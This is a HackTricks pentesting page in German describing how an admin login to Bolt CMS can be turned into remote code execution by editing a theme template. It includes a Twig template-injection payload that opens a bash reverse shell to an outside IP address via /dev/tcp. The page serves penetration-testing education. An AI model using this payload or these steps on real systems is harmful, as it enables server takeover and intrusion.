hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

3.4 KiB

Bolt CMS

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

RCE

Nach dem Login als Admin (gehe zu /bot, um die Anmeldemaske zu erreichen), kannst du RCE in Bolt CMS erhalten:

  • Wähle Konfiguration -> Konfiguration anzeigen -> Hauptkonfiguration oder gehe zu dem URL-Pfad /bolt/file-edit/config?file=/bolt/config.yaml
  • Überprüfe den Wert des Themas
  • Wähle Dateiverwaltung -> Vorlagen anzeigen & bearbeiten
  • Wähle das im vorherigen Schritt gefundene Basis-Thema (base-2021 in diesem Fall) und wähle index.twig
  • In meinem Fall ist dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig
  • Setze dein Payload in diese Datei über Template Injection (Twig), wie: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
  • Und speichere die Änderungen
  • Leere den Cache in Wartung -> Cache leeren
  • Greife erneut als regulärer Benutzer auf die Seite zu, und das Payload sollte ausgeführt werden

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}